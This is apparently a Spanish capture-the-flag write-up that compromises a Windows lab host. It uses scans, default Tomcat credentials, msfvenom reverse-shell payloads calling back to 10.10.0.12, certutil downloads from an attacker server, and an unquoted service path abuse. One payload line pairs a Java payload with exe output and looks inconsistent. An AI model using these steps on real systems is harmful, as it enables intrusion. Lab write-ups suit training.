nmap -A -p- -oA deployable 172.31.1.13 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210708083051.png

nmap -sC -sV -O -p- -oA deployable 172.31.1.13

nmap -sU -O -p- -oA deployable-udp 172.31.1.13

nikto -h 172.31.1.13:80

gobuster dir -k -u http://172.31.1.13/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210708083204.png

https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

Usamos tomcat:s3cret como credenciales y nos metemos a Manager App


msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f war -o deploy_shell.war

Pasted image 20210708084226.png

nc -lvnp 4444

Pasted image 20210708084341.png

Pasted image 20210708084452.png

Antes de esto subimos y corremos el archivo de winPeas

python3 -m http.server 8888

certutil.exe -urlcache -split -f http://10.10.0.12:8888/winPEASany.exe winPEASany.exe

Pasted image 20210708085051.png

Al correr winPeas vemos que dice No quotes or spaces detected

Pasted image 20210708085407.png

python3 -m http.server 8888

certutil.exe -urlcache -split -f http://10.10.0.12:8888/accesschk.exe accesschk.exe

Pasted image 20210708085721.png

accesschk.exe /accepteula -ucqv Deploy

Pasted image 20210708085910.png

Vemos que el usuario tomcat tiene permisos de iniciar y parar.

Pasted image 20210708090415.png

Nos metemos al directorio Deploy Ready

Creamos un shell llamado Service.exe


msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.0.12 LPORT=5555 -f exe -o Service.exe

python3 -m http.server 8888

certutil.exe -urlcache -split -f http://10.10.0.12:8888/Service.exe Service.exe

Pasted image 20210708090710.png

nc -lvnp 5555

En C:\Program Files\Deploy Ready corremos lo siguiente

sc start Deploy

Pasted image 20210708091014.png

boxes

copyright©2022 Cu3rv0x all rights reserved